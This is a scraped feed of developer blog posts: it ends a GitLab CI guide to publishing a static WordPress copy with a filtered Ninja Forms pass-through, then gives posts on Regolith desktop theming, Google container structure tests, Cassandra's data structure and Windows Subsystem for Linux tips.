    The known host file contains the signature of your remote host.
    This is the output that you generated with ssh-keyscan.
    This should be of type File.
  • $RSYNC_REMOTE
    Example: webspaceuser@yourdomain.tld:static
    The rsync remote to upload the static copy to. This is in the scheme of user@host:directory.
  • $WORDPRESS_URL
    The url to your wordpress installation. This is the starting point for wget.
    This should be of type Variable.
  • $HTTP_USER
    The user used by wget to access your WordPress installation using basic auth. This is the user that you put in your .htpasswd file.
    This should be of type Variable.
  • $HTTP_PASSWORD
    The password for HTTP_USER used by wget to access your WordPress installation using basic auth.
    This should be of type Variable, state Protected and Masked.

Our GitLab pipeline will have two phases for now: crawl and deploy. They are going to run the commands that we discussed in the previous sections in different Docker containers. This is the .gitlab-ci.yml:

stages:
    - crawl
    - deploy

before_script:
    - echo "[INFO] setup credentials for ssh"
    - mkdir ~/.ssh
    - cp "${SSH_ID_RSA}" ~/.ssh/id_rsa
    - cp "${SSH_ID_RSA_PUB}" ~/.ssh/id_rsa.pub
    - cp "${SSH_KNOWN_HOSTS}" ~/.ssh/known_hosts
    - chmod 700 ~/.ssh
    - chmod 600 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub

crawl:
    image:
        name: cirrusci/wget@sha256:3030b225419dc665e28fa2d9ad26f66d45c1cdcf270ffea7b8a80b36281e805a
        entrypoint: [""]
    stage: crawl

    script:
        - rm -rf wp_2789218 static
        - |
            wget \
                -e robots=off \
                --recursive \
                --page-requisites \
                --convert-links \
                --restrict-file-names=windows \
                --http-user="${HTTP_USER}" \
                --http-password="${HTTP_PASSWORD}" \
                --no-host-directories \
                --trust-server-names \
                --adjust-extension \
                --content-on-error \
                "${WORDPRESS_URL}/" \
                "${WORDPRESS_URL}/robots.txt"

        - find wp_2789218/ -type f -exec sed -i -E 's/wp_2789218(\\\/|%2F|\/)?//g' {} \;
        - mv wp_2789218 static
    artifacts:
        paths:
            - static/*
        expire_in: 1 month
    only:
        - master

deploy:
    image:
        name: eeacms/rsync@sha256:de654d093f9dc62a7b15dcff6d19181ae37b4093d9bb6dd21545f6de6c905adb
        entrypoint: [""]
    stage: deploy
    script:
        - rsync -avh --delete --checksum static/ "${RSYNC_REMOTE}"
    dependencies:
        - crawl
    only:
        - master

That’s pretty much it, now you have a pipeline that will generate a static copy of your WordPress site and upload that back to your web space. You could set up a schedule for your pipeline to run automatically on a regular basis or you can use the Run Pipeline button to start the process manually.

We would like to add one more step to our pipeline. It’s always good to do a little bit of testing, especially if you’re executing things automatically without supervision. If the crawler fails for whatever reason to download your complete website, you probably want the pipeline to fail before going into the deploy phase and breaking your website for visitors. So let’s perform some basic sanity checks on the static copy before starting the deploy phase. The following checks are all very basic, and it’s probably a good idea to add some more that are specific to your installation. Just check for the existence of some sub pages, images, etc. and grep for some strings. You probably also want to make the existing rules a bit stricter.

stages:
    - crawl
    - verify_crawl
    - deploy

[...]

verify_crawl:
    image: alpine:3.11.3
    stage: verify_crawl
    script:
        - echo "[INFO] Check that dump is at least 1 mb in size"
        - test "$(du -c -m static/ | tail -1 | cut -f1)" -gt 1

        - echo "[INFO] Check that dump is less than 500 mb in size"
        - test "$(du -c -m static/ | tail -1 | cut -f1)" -lt 500

        - echo "[INFO] Check that there are at least 50 files"
        - test "$(find static/ | wc -l)" -gt 50

        - echo "[INFO] Check that there is a index.html"
        - test -f static/index.html

        - echo "[INFO] Look for 'wordpress' in index.html"
        - grep -q 'wordpress' static/index.html
    dependencies:
        - crawl
    only:
        - master

[...]

Adding a contact form

Even the most basic websites usually need a little bit of dynamic functionality; in our case we needed a contact form. We decided to go with Ninja Forms Contact Form. Ninja Forms works by sending requests to wp-admin/admin-ajax.php. This will obviously fail on our static website. To make it work, we will need to reroute requests to admin-ajax.php to our WordPress backend.  The admin-ajax.php endpoint is used by all sorts of plugins, not only Ninja Forms, and to increase security we want to whitelist only the calls made by Ninja Forms. Ninja Forms makes a POST request with application/x-www-form-urlencoded and the parameter action set to nf_ajax_submit. Since there is no way (at least none that we know of) in Apache to filter on form parameters, we will need to solve this in PHP. The idea is to create an alternative admin-ajax.php to call instead, which in turn calls the wp-admin/admin-ajax.php in the WordPress backend, but only for Ninja Forms requests. To further increase protection from bots, we will not name our pass-through script admin-ajax.php but give it the random name admin-ajax-oAEhFc.php. This won’t really help us against intelligent attackers, but it should stop most bots that try to use an exploit against wp-admin/admin-ajax.php.

First we will need to modify the .gitlab-ci.yml file to add an extra find & sed after wget to the crawl step, to change all URLs from “wp-admin/admin-ajax.php” to “admin-ajax-oAEhFc.php”:

[...]
- find wp_2789218/ -type f -exec sed -i -E 's/wp-admin(\\\/|%2F|\/)admin-ajax.php/admin-ajax-oAEhFc.php/g' {} \;
[...]

Then we will need to add the admin-ajax-oAEhFc.php to the root of our web space. This file simply checks whether the request is indeed a Ninja Forms call and then includes the wp-admin/admin-ajax.php from the WordPress backend. After that we fix any URLs in the output that still point to our WordPress installation, so that they point to our static site instead.

<?php 
/* Pass through some functions to the admin-ajax.php of the real wp backend. */

// Capture output, so that we can fix urls later.
ob_start();

// Pass through ninja forms
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST) && $_POST['action'] == 'nf_ajax_submit') {
    require (__DIR__ . '/wp_2789218/wp-admin/admin-ajax.php');
}

// Everything else should fail.
else {
    echo '0';
}

// Fix urls in output.
$contents = ob_get_contents();
ob_end_clean();


$search_replace = array(
    'wp_2789218/'                => '',
    'wp_2789218\\/'              => '',
    'wp_2789218%2F'              => '',
    'wp_2789218'                 => '',
    'wp-admin/admin-ajax.php'    => 'admin-ajax-oAEhFc.php',
    'wp-admin\\/admin-ajax.php'  => 'admin-ajax-oAEhFc.php',
    'wp-admin%2Fadmin-ajax.php'  => 'admin-ajax-oAEhFc.php',
);

echo str_replace(array_keys($search_replace), array_values($search_replace), $contents);

Finally we will need to modify the .htaccess file to allow requests to admin-ajax-oAEhFc.php and to not rewrite them to static/.

[...]
# Rewrite all request to the static directory.
# Except for requests to the wp installation.
RewriteCond %{REQUEST_URI} !^/static.*
RewriteCond %{REQUEST_URI} !^/admin-ajax-oAEhFc.php$
RewriteCond %{REQUEST_URI} !^/wp_2789218.*
RewriteRule ^(.*)$ static/$1 [L]

And that’s it. If you have done everything correctly after running your pipeline again, Ninja Forms should work.

A similar procedure should work for many other plugins too. Though keep in mind that with every plugin you allow access to your backend, you also increase the attack surface.

Adding a custom 404 page

You may want to have a custom 404 page instead of the standard 404 error page that Apache serves by default. Assuming that you have already created a nice-looking 404 page in your WordPress installation, in theory we could just use Wget to request a URL that does not exist and use the output of that. Unfortunately, Wget does a terrible job dealing with non-200 status codes: there is a --content-on-error option that lets it download the contents of a 404 page, but it will refuse to download any images, stylesheets or other resources attached to it.

To deal with that situation we will simply create a normal page in our WordPress backend and use that as a 404 page. So create your page in WordPress and remember the url you gave it.

We can now add that url to our list of files for Wget to download and then use the .htaccess file to redirect all 404 requests to that file.

OK, so let’s add our 404 page to the wget command in the .gitlab-ci.yml file:

 

[...]
    - |
            wget \
                -e robots=off \
                --recursive \
                --page-requisites \
                --convert-links \
                --restrict-file-names=windows \
                --http-user="${HTTP_USER}" \
                --http-password="${HTTP_PASSWORD}" \
                --no-host-directories \
                --trust-server-names \
                --adjust-extension \
                --content-on-error \
                "${WORDPRESS_URL}/" \
                "${WORDPRESS_URL}/robots.txt" \
                "${WORDPRESS_URL}/notfound"
[...]

To redirect all 404 errors to notfound/index.html we will have to add one instruction to the .htaccess file:

ErrorDocument 404 /static/notfound/index.html

If you have done everything correctly, after you run your pipeline and visit any non-existing URL you should get your custom error page. However, if you try to access a deeper level like yourdomain.tld/bogus/bogus/bogus it will probably look broken, with missing styles and images.

This is because Wget will rewrite all links to be relative and we access our 404 page from different paths. To fix this we can add a <base> tag inside of the <head> with an absolute url. We insert the base tag with sed after running Wget in the .gitlab-ci.yml like this:

[...]
        - sed -i 's|<head>|<head><base href="/notfound/">|' wp_2789218/notfound/index.html
[...]

And that’s it: if you run your pipeline again, the 404 page should look fine.

Conclusion

We have successfully created a GitLab job that generates and publishes a static copy of a WordPress site, and we have secured the actual WordPress backend against attacks from bots and humans. And because of the 2000 free CI minutes that GitLab is currently offering, it didn’t even cost us a dime. If you can live with the limitations of a static website, we definitely recommend this or a similar solution. It will push the risk of getting hacked near zero and you will no longer need to spend precious time ensuring that your site and all of its plugins are up to date. Also, your site will be as fast as lightning.

Go ahead and fork: https://gitlab.com/sgellweiler/demo-wordpress-static-copy. And let us know how it works for you in the comment section.

Best regards,

Sebastian Gellweiler

Regolith Quickstart: Creating a Custom-Theme
https://craftcoders.app/regolith-quickstart-creating-a-custom-theme/ (Fri, 14 Feb 2020)

This post is intended for beginners of i3, or more specifically Regolith. Since i3 is just a window manager and not a fully fledged desktop environment, you might have encountered some issues using a pure version of i3.

Regolith is a modern desktop environment that saves you time by reducing the clutter and ceremony that stand between you and your work. Built on top of Ubuntu and GNOME, Regolith stands on a well-supported and consistent foundation. (from Regolith website)

Regolith, on the other hand, integrates i3 into Ubuntu and GNOME. Even though I didn’t expect it, Regolith really works like a charm. The only thing that can be tricky at first sight is customization, and that’s what we’re going to tackle right now!

Preview

Here are two sample images of the system we’re trying to create.

Components

Regolith consists of a couple of components that make configuration easier. In the screenshot below you can see where each component comes into play (and how your system should look at the end of this tutorial).

regolith-screenshot

The screenshot can give a first impression, but it doesn’t contain all the components that are involved. Rofi for example can be seen in the second preview picture. Let’s dig a little bit deeper to get a better understanding of configuration:

  • i3gaps: a fork of i3 with additional functionality. i3 is a dynamic tiling window manager, but you probably know it already if you chose to read this post. Influences the style of: i3xrocks.
  • Xresources: a user-level configuration dotfile, typically located at ~/.Xresources. This is more or less our “root-config” that loads all other component-configs. Influences the style of: everything.
  • Rofi: provides the user with a textual list of options where one or more can be selected, mostly for running an application or selecting a window.
  • i3xrocks: a Regolith fork of i3blocks that uses Xresources. i3blocks generates a status bar with user-defined blocks, like a clock.
  • compton: a compositor for X based on Dana Jansens’ version of xcompmgr. In short, it renders your display output. Influences the style of: i3gaps, i3xrocks, Rofi.

Creating a Custom-Theme

So now we’re getting to the fun part. All the proposed components have their own system-global configuration files. At the end of the Regolith Customize wiki page, you can see each configurations’ location.

Setting a background image

Let’s start out easy. Since Regolith handles the integration between your Ubuntu settings and the i3 window manager, you can use the Ubuntu settings to replace your background image. Hit SUPER+C and navigate to the Background tab. If you want, you can download my wallpaper here.
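If you prefer the terminal, GNOME’s gsettings should do the same job; the wallpaper path below is just a placeholder:

$ gsettings set org.gnome.desktop.background picture-uri "file:///home/youruser/Pictures/wallpaper.jpg"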

Staging configuration files

First, we need to stage the Xresources file, which means to copy it to a user-accessible location. Furthermore, we need to create a folder to stage our other configuration files:

$ cp /etc/regolith/styles/root ~/.Xresources-regolith
$ mkdir ~/.config/regolith/

If you take a look at the Xresources config, you can see that all it does is reference these configurations:

  1. Color theme
  2. System font
  3. GTK Theme
  4. st-term (Regolith default terminal)
  5. i3-wm
  6. i3xrocks
  7. Rofi
  8. Gnome

We’re heading for the files in the “styles” folder. They are only for theming, so don’t confuse them with the config files that change the applications’ behavior like “~/.config/i3/config”. Let’s stage some of these style-configs and apply our new styles:

$ mkdir ~/.config/regolith/styles/
$ cp /etc/regolith/styles/color-nord ~/.config/regolith/styles/custom-coloring
$ cp /etc/regolith/styles/theme-regolith ~/.config/regolith/styles/theme-sweet
$ cp /etc/regolith/styles/i3-wm ~/.config/regolith/styles/i3-wm
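For the staged copies to actually be used, the references inside ~/.Xresources-regolith have to point at them instead of the defaults under /etc/regolith/styles/. The exact directives differ between Regolith versions, so treat the following only as a sketch (the home path is a placeholder):

! In ~/.Xresources-regolith: load the staged style files instead of the system-wide ones
#include "/home/youruser/.config/regolith/styles/custom-coloring"
#include "/home/youruser/.config/regolith/styles/theme-sweet"
#include "/home/youruser/.config/regolith/styles/i3-wm"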

A custom coloring scheme

These are the colors that will be used in your desktop environment. Just copy the content into your own file. If you want to define your own colors coolors.co is a good starting point to get inspiration 🙂

--- File: custom-coloring ---

! Custom colors
#define color_base03   #26262d
#define color_base02   #474956
#define color_base01   #4c4d5b
#define color_base00   #c0c3db
#define color_base0    #edf2ff
#define color_base1    #E5E9F0
#define color_base2    #ECEFF4
#define color_base3    #f2f5f9
#define color_yellow   #edcd8e
#define color_orange   #e59572
#define color_red      #e57472
#define color_magenta  #908dc4
#define color_violet   #9d8dc4
#define color_blue     #81A1C1
#define color_cyan     #88C0D0
#define color_green    #A3BE8C

GTK and icon theme

--- File: theme-sweet ---

#define gtk_theme       Sweet-Dark
#define icon_theme      Sweet-Purple

For this to work, you need to copy the Sweet icon theme and Sweet GTK theme onto your machine. Of course, you are free to choose whatever theme you like. Their names (Sweet-Dark for the theme and Sweet-Purple for the icons) are defined in their config files, both named "index.theme". My setup is available here:

You need to copy them to one of the two possible paths:

Theme: ~/.themes/ or /usr/share/themes/
Icons: ~/.icons/ or /usr/share/icons/ 

i3-wm config

The i3-wm config (for i3gaps) defines which color from our custom-coloring file is used for what. Furthermore, it defines how workspaces are displayed in the i3bar and how i3xrocks looks in general. So now is the time to define which workspace should be used for which use case. In my case I have separate workspaces for:

  • Browser
  • Terminals
  • Text Editing (VS-Code)
  • Coding (IDE’s like IntelliJ)
  • Chatting
  • Music

All the other workspaces are used randomly and are thus called "Other".

--- File: i3-wm ---

#define Q(x) #x
#define QUOTE(x) Q(x)

#define glyph typeface_bar_glyph_workspace

i3-wm.bar.font: typeface_bar

i3-wm.bar.background.color: color_base03
i3-wm.bar.statusline.color: color_base00
i3-wm.bar.separator.color: color_yellow
i3-wm.bar.workspace.focused.border.color: color_base02
i3-wm.bar.workspace.focused.background.color: color_base02
i3-wm.bar.workspace.focused.text.color: color_base2
i3-wm.bar.workspace.active.border.color: color_base02
i3-wm.bar.workspace.active.background.color: color_base02
i3-wm.bar.workspace.active.text.color: color_base00
i3-wm.bar.workspace.inactive.border.color: color_base03
i3-wm.bar.workspace.inactive.background.color: color_base03
i3-wm.bar.workspace.inactive.text.color: color_base00
i3-wm.bar.workspace.urgent.border.color: color_red
i3-wm.bar.workspace.urgent.background.color: color_red
i3-wm.bar.workspace.urgent.text.color: color_base3

i3-wm.client.focused.color.border: color_base03
i3-wm.client.focused.color.background: color_base01
i3-wm.client.focused.color.text: color_base3
i3-wm.client.focused.color.indicator: color_blue
i3-wm.client.focused.color.child_border:

i3-wm.client.focused_inactive.color.border: color_base03
i3-wm.client.focused_inactive.color.background: color_base02
i3-wm.client.focused_inactive.color.text: color_base0
i3-wm.client.focused_inactive.color.indicator: color_base02
i3-wm.client.focused_inactive.color.child_border:

i3-wm.client.unfocused.color.border: color_base03
i3-wm.client.unfocused.color.background: color_base02
i3-wm.client.unfocused.color.text: color_base0
i3-wm.client.unfocused.color.indicator: color_base02
i3-wm.client.unfocused.color.child_border:

i3-wm.client.urgent.color.border: color_base03
i3-wm.client.urgent.color.background: color_red
i3-wm.client.urgent.color.text: color_base3
i3-wm.client.urgent.color.indicator: color_red
i3-wm.client.urgent.color.child_border:

#define glyph_font QUOTE(typeface_bar_glyph)
#define WORKSPACE_NAME(INDEX, NAME, FONT) INDEX<span font_desc=FONT> INDEX: NAME </span>

i3-wm.workspace.01.name: WORKSPACE_NAME(1, BR0WSER, glyph_font)
i3-wm.workspace.02.name: WORKSPACE_NAME(2, T3RM, glyph_font)
i3-wm.workspace.03.name: WORKSPACE_NAME(3, ED1T1NG, glyph_font)
i3-wm.workspace.04.name: WORKSPACE_NAME(4, C0D1NG, glyph_font)
i3-wm.workspace.05.name: WORKSPACE_NAME(5, C0D1NG, glyph_font)
i3-wm.workspace.06.name: WORKSPACE_NAME(6, 0TH3R, glyph_font)
i3-wm.workspace.07.name: WORKSPACE_NAME(7, 0TH3R, glyph_font)
i3-wm.workspace.08.name: WORKSPACE_NAME(8, 0TH3R, glyph_font)
i3-wm.workspace.09.name: WORKSPACE_NAME(9, CH4T, glyph_font)
i3-wm.workspace.10.name: WORKSPACE_NAME(10, MUS1C, glyph_font)
i3-wm.workspace.11.name: WORKSPACE_NAME(11, 0TH3R, glyph_font)
i3-wm.workspace.12.name: WORKSPACE_NAME(12, 0TH3R, glyph_font)
i3-wm.workspace.13.name: WORKSPACE_NAME(13, 0TH3R, glyph_font)
i3-wm.workspace.14.name: WORKSPACE_NAME(14, 0TH3R, glyph_font)
i3-wm.workspace.15.name: WORKSPACE_NAME(15, 0TH3R, glyph_font)
i3-wm.workspace.16.name: WORKSPACE_NAME(16, 0TH3R, glyph_font)
i3-wm.workspace.17.name: WORKSPACE_NAME(17, 0TH3R, glyph_font)
i3-wm.workspace.18.name: WORKSPACE_NAME(18, 0TH3R, glyph_font)
i3-wm.workspace.19.name: WORKSPACE_NAME(19, 0TH3R, glyph_font)

Using our new configurations

Now we can finally make use of our new config files. Therefore, we need to replace the references in our .Xresources-regolith file. In the end it should look something like this (make sure to replace USER with your username):

--- File: .Xresources-regolith ---

! This is the Regolith root-level Xresources file.
!
! -- Styles - Colors
!
! Uncomment one and only one of the following color definitions: 
#include "/home/USER/.config/regolith/styles/custom-coloring"

! -- Styles - Fonts
! NOTE: Font packages may need to be installed when enabling typefaces.
! Uncomment one and only one of the following font definitions:
#include "/etc/regolith/styles/typeface-sourcecodepro"
!#include "/etc/regolith/styles/typeface-ubuntu"

! -- Styles - Theme
! NOTE: GTK theme and icon packages may need to be installed when enabling themes.
! Uncomment one and only one of the following theme definitions:
!
#include "/home/USER/.config/regolith/styles/theme-sweet"

! -- Applications
! These files map values defined above into specific app settings.
#include "/etc/regolith/styles/st-term"
#include "/home/USER/.config/regolith/styles/i3-wm"
#include "/etc/regolith/styles/i3xrocks"
#include "/etc/regolith/styles/rofi"
#include "/etc/regolith/styles/gnome"

As you can see, we also replaced the system font, switching from typeface-ubuntu to typeface-sourcecodepro. Now save, log out and back in so that your changes are applied.

Conclusion

That’s it! Now your system should be really similar to the screenshots above 🙂 As you can see customization is pretty straightforward as soon as you got a basic understanding of the used components and their configurations. If you want take a look at staging your own i3- and i3xrocks config files, to use your new desktop environment to the fullest. Alternatively, you can take a look at my dotfiles to get a glimpse of my system. Whatever you do, have fun tweaking your UI!

Greetings, Domi

Sophisticated Google container structure tests https://craftcoders.app/sophisticated-google-container-structure-tests/ Mon, 20 May 2019 08:00:39 +0000 https://craftcoders.app/?p=1043

Last week we did an innovation week at our company, crowding up together and trying to figure out what can be done to improve our systems. Our group chose to set up a private Docker registry and to automate the creation of Docker images for our test system. After some research we came up with Google's framework named container structure tests to verify that the automatically created containers are actually working.

The Container Structure Tests provide a powerful framework to validate the structure of a container image. These tests can be used to check the output of commands in an image, as well as verify metadata and contents of the filesystem.

GoogleContainerTools @ Github

The way it always is: you can create very simple test scenarios very fast, but there is little documentation when it comes to more complicated stuff. With this post I want to sum up the pitfalls you might encounter and offer solutions, so you can get the most out of the framework. If you need to know the basic stuff first, jump over to the readme and come back later 😉

Pitfalls and solutions

Image entry-points are removed by default

Every Docker container comes with an entrypoint defining what it should do on startup. Entrypoints can influence the structure of the container or consume a lot of time, so they are removed by default. In our case we needed the entrypoint, since we wanted to test whether our PostgreSQL container is working properly. What you should do (according to the docs) is use the setup section of the test, like so:

commandTests:
  - name: "postgres starts without errors"
    setup:
      - ["./docker-entrypoint.sh", "postgres"]
    command: "psql"
    args: ["-d", "db-name", "-U", "db-user", "-c", "\q"]

This small test should start a new container, run the entrypoint script for postgres and finally check that we can connect to a database without any error. The exit code is expected to be zero by default. Sadly, this is not how it actually works as you will see in the next section.

Every command runs in a separate container instance

The setup section, as well as the teardown section, is a list of commands, whereas the command section is just a single command. Each of these commands runs in its own separate container and then commits a modified image to be the new base image for the next command in the list. Since in our postgres example the entrypoint starts a database in a setup command, this database will be running in that command's container only. This leads to the need to run multiple commands in the same container, which we can't accomplish using the setup section.

Multi-line commands

We can trick the framework into running multiple commands in the same container using bash -c <list of commands>. Since this can get convoluted pretty fast, we can make use of YAML's "literal style" option (the | sign) to preserve newlines.

  - name: "postgres starts without errors"
    command: "bash"
    args:
      - -c
      - |
          bash -c './docker-entrypoint.sh postgres &' &&
          sleep 10 &&
          psql -d "db-name" -U "db-user" -c '\q'

This is the final (and actually working) version of the same test. As you can see, we are now running the docker-entrypoint script in the same container as the psql command. But since the script starts a database instance, we had to wrap it in a second bash -c command so we could detach it from the console output with the ampersand (&) at the end. Furthermore, we had to add some sleep time to give the database a chance to come up before we check whether it is working.

Switching user profiles

Sometimes it might be necessary to run a command as a user other than root. As user postgres, for example 😀 Fortunately, this can be accomplished similarly to bash -c, using su -c like this:

  - name: "run a command as a different user"
    command: "su"
    args:
      - postgres
      - -c
      - whoami
    expectedOutput: ["postgres"]

Alrighty, that’s all I wanted to share for now. I hope the post will spare some time of yours. Please keep in mind that Google’s framework container structure tests has been made to verify the structure and general setup of your container. It is not meant to be used for something like integration tests. Thank’s for reading and have a nice day 🙂

Greets, Domi

A deep dive into Apache Cassandra – Part 1: Data Structure (was not continued) https://craftcoders.app/a-deep-dive-into-apache-cassandra-part-1-data-structure/ Mon, 01 Oct 2018 19:14:56 +0000 https://craftcoders.app/?p=749

Hey guys,

during my studies I had to analyze the NoSQL database Cassandra as a possible replacement for a regular relational database.
During my research I dove really deep into the architecture and the data model of Cassandra, and I figured that someone may profit from my previous research, be it for your own evaluation of Cassandra or just out of personal curiosity.


I will separate this huge topic into several posts and make a little series out of it. I don’t know how many parts the series will contain yet, but I will try to keep every post as cohesive and understandable as possible.

Please forgive me, as I have to introduce at least a couple of terms or concepts I won’t be able to describe thoroughly in this post. But don’t worry, I will be covering them in an upcoming one.

What is Cassandra?

Cassandra is a column-oriented open-source NoSQL database whose data model is based on Google's Bigtable and whose distributed architecture is based on Amazon's Dynamo. It was originally developed by Facebook; later it became an Apache project and is now one of Apache's top-level projects. Cassandra is based on the idea of a decentralized, distributed system without a single point of failure and is designed for high data throughput and high availability.

Cassandra's Data Structure

I decided to begin my series with Cassandra's data structure because it is a good introduction to the general ideas behind Cassandra and a good foundation for future posts regarding the Cassandra Query Language and its distributed nature.

I will try to give you an overview of how data is stored in Cassandra and show you some similarities and differences to a relational database, so let's get right to it.

Columns, Rows and Tables

The basic component in Cassandra's data structure is the column, which classically consists of a key/value pair. Individual columns are combined into a row, which is uniquely identified by a primary key. A row consists of one or more columns plus the primary key, which itself can consist of one or more columns. To connect individual rows describing the same entity into a logical unit, Cassandra defines tables, which are containers for similar data in row format, equivalent to relations in relational databases.

the row data structure in Cassandra

However, there is a remarkable difference to the tables in relational databases. If individual columns of a row are not used when writing to the database, Cassandra does not store a null value for them; the entire column is simply not stored. This is a storage-space optimization, and it gives the table data model similarities to a multidimensional array or a nested map.
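To make the nested-map analogy a bit more concrete, here is a tiny illustration in plain Python. It is only a sketch with made-up table and column names, not Cassandra's actual storage format:

# Illustration only: a table seen as a nested map.
# Outer key: the row's primary key; inner map: only the columns that were actually written.
users_by_id = {
    "user-1": {"name": "Alice", "email": "alice@example.org"},
    "user-2": {"name": "Bob"},  # "email" was never written, so the column simply does not exist
}

# A missing column is absent instead of being stored as a null value:
print("email" in users_by_id["user-2"])  # False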

table consisting of skinny rows

Skinny and Wide Rows

Another special feature of the tables in Cassandra is the distinction between skinny and wide rows. So far I have only described skinny rows, i.e. rows that do not have a composite primary key with clustering columns and that have few entries in the individual partitions, in most cases only one entry per partition.

You can imagine a partition as an isolated storage unit within Cassandra. There are typically several hundred of said partitions in a Cassandra installation. During a write or read operation the value of the primary key gets hashed. The resulting value of the hash algorithm can be assigned to a specific partition inside the Cassandra installation, as every partition is responsible for a certain range of hash values. I will dedicate a whole blog post to the underlying storage engine of Cassandra, so this little explanation has to suffice for now.

Wide rows typically have a significant number of entries per partition. These wide rows are identified by a composite key, consisting of a partition key and optional clustering keys.

table consisting of wide rows


When using wide rows you have to pay attention to the limit of two billion entries per partition, which can be reached quite fast when storing measured values of a sensor; once the limit is reached, no more values can be stored in that partition.


The partition key can consist of one or more columns, just like the primary key. Therefore, to stay with the example of the sensor data, it makes sense to select the partition key according to several criteria. Instead of simply partitioning by, for example, a sensor_id, which depending on the amount of incoming measurement data would sooner or later inevitably exceed the limit of 2 billion entries per partition, you can combine the partition key with the date of the measurement. If you combine the sensor_id with the date of the measurement, the data is written to another partition on a daily basis. Of course you can make this coarser or finer as you wish (hourly, daily, weekly, monthly).
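As a small sketch of this idea (in Python, with made-up names, independent of the actual CQL syntax), composing the partition key from the sensor_id and the measurement date gives every sensor a fresh partition each day:

from datetime import datetime

# Illustration only: bucket measurements per sensor and per day.
def partition_key(sensor_id: str, measured_at: datetime) -> tuple:
    return (sensor_id, measured_at.strftime("%Y-%m-%d"))

print(partition_key("sensor-42", datetime(2018, 10, 1, 19, 14)))  # ('sensor-42', '2018-10-01')
print(partition_key("sensor-42", datetime(2018, 10, 2, 8, 30)))   # ('sensor-42', '2018-10-02')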

The clustering columns are needed to sort data within a partition. A primary key without additional clustering columns is at the same time the partition key.

Several tables are collected into a keyspace, which is the exact equivalent of a database in relational databases.

Summary

To summarize, the basic data structures are:

  • the column, consisting of key/value pairs,
  • the row, which is a container for contiguous columns, identified by a primary key,
  • the table, which is a container for rows and
  • the keyspace, which is a container for tables.

I hope I was able to give you a rough overview of the data structure Cassandra uses. The next post in this series will be about the Cassandra Query Language (CQL), in which I will give you some more concrete examples how the data structure affects the data manipulation.

Cheers,

Leon

5 Things I love about WSL https://craftcoders.app/5-things-i-love-about-wsl/ Mon, 17 Sep 2018 08:00:48 +0000 https://craftcoders.app/?p=683

I got a new PC and love it! But a new PC also means a whole new setup and a lot of work. One of the first things I've set up has been the Windows Subsystem for Linux (WSL). I know I am a developer and most of you would not expect me to work on a Windows machine. Guys, I must tell you Windows is fucking awesome and with WSL it's just getting more awesome! Here are five things I really love about WSL:

1. Interoperability

Starting with Windows build 14951 Microsoft added the possibility to (1) invoke Linux binaries from the Windows console, (2) invoke Windows binaries from the Linux console and (3) share environment variables between Windows and Linux. Furthermore, with the Fall Creators Update Microsoft included the Windows path in the Linux $PATH, so it is easy to call Windows binaries from Linux. To call a Windows binary from the Linux console you just have to type:

[binary name].exe

For instance, you could open the Windows file explorer at the current location of your Linux console by simply calling:

 explorer.exe .
launching explorer from the Linux Console

2. Docker

Okay, now I'm gonna cheat, but it's so cool it deserves to be its own point. Due to the interoperability between WSL and Windows you do not need to expose some creepy port or build a complicated relay between WSL and Windows. You can just run "docker.exe" to use Docker for Windows inside your Linux console. OK, I admit this is not very practical since you always have to type ".exe". But Linux is awesome and lets you define aliases for such things. All you need to do is:

  1. Open ~/.bashrc
  2. Go to the end of the file
  3. Add the following lines (at the end):
    alias docker=docker.exe
    alias docker-compose=docker-compose.exe
Docker

3. WSLGIT

As mentioned in (1) you can execute Windows binaries from the Linux console. As a result, you can open VSCode from the Linux console. Here's the catch: VSCode would still use Git for Windows. This is not really a problem and it works. I really love to use git inside my Linux console, but I don't want to manage two git installations on the same machine. One could argue that you could do the same trick as we did with Docker, and that's true, but this time we do it the other way round. There is a GitHub project from andy-5 called WSLGIT. Basically, this project provides a small executable that forwards arguments to git running inside Bash on Windows. All that needs to be done is:

  1. Download the executable
  2. Save the .exe somewhere
  3. Change the settings of your IDEs to use wslgit.exe as git executable

4. X-Server for Windows

So, what can’t be done with WSL? Right you can not run graphical applications. Can`t you? That’s just partial true: You can use an implementation of X-Server for windows and forward it inside your bash. I use the Xming X Server. Simply download it and install it. After installation open XLaunch, select “Multiple Windows” and “Display Number 0” at the first screen. Select “Start no client” at the second screen. Select “Clipboard” and go forward. Now you can save this configuration and add it to your autostart folder. That why you never have to configure it again (even when we just used the default configuration ?). Inside your Linux console you just must run

export DISPLAY=:0

and you are ready to go. Now you can start graphical applications!

Fixing HDPI

You may encounter the same problem as I did. My new PC has a UHD resolution and graphical applications running with the Xming X Server are blurry. This is the fault of the Windows compatibility mode that scales the application. To fix it you need to:

1. Navigate to the installation folder of Xming 
2. Open the Properties of Xming.exe
3. Click on compatibility
4. Click on HDPI-Settings
5. Override HDPI-Setting with application defaults

DPI-Settings



So, now every Linux application is really small. But never mind, we can fix that inside Linux! If we use a GTK application, we can just increase the GTK scaling factor by typing:

export GDK_SCALE=3

The power of X-Server

5. Seamlessly using Linux

This heading sums it up, but I will show you what I mean by example. We're going to run Tilix, a tiling terminal emulator for Linux using GTK+ 3, as if it were an ordinary Windows application. Note that to do this you need to follow the instructions under point (4). I'm assuming you already did that. To install Tilix we just need to type:

sudo add-apt-repository ppa:webupd8team/terminix
sudo apt-get update
sudo apt-get install tilix

You might encounter some problems regarding the dbus service. For instance, you could get an error message like this:

failed to commit changes to dconf: Failed to execute child process “dbus-launch” (No such file or directory)

 

Don't you worry, child! It is easy to fix. We just need to install the dbus service and start it:

sudo apt-get install dbus-x11
sudo service dbus start

That’s all! The make it more convenient to use we are going to write a small script to launch it. Just open VSCode and copy and paste following:

args = "-c" & " -l " & """GDK_SCALE=3 DISPLAY=:0 tilix"""

WScript.CreateObject("Shell.Application").ShellExecute "bash", args, "", "open", 0

NOTE: if you don’t have UDH resolution you can remove following GDK_SCALE=3. Save the script under …Programms/Tilix and name it tilix.vbs. Now we need a second script a simple bat file that we use to invoke our first script:

WScript tilix.vbs

Almost done! We can now send the bat script to the desktop and get a nice clickable icon that can be used to launch Tilix. If you put it in the Start menu folder you can even use it from the Start menu in Windows 10!

running tilix
Smartphone Sensors for Dummies https://craftcoders.app/smartphone-sensors-for-dummies/ Sun, 09 Sep 2018 17:13:29 +0000 https://craftcoders.app/?p=616

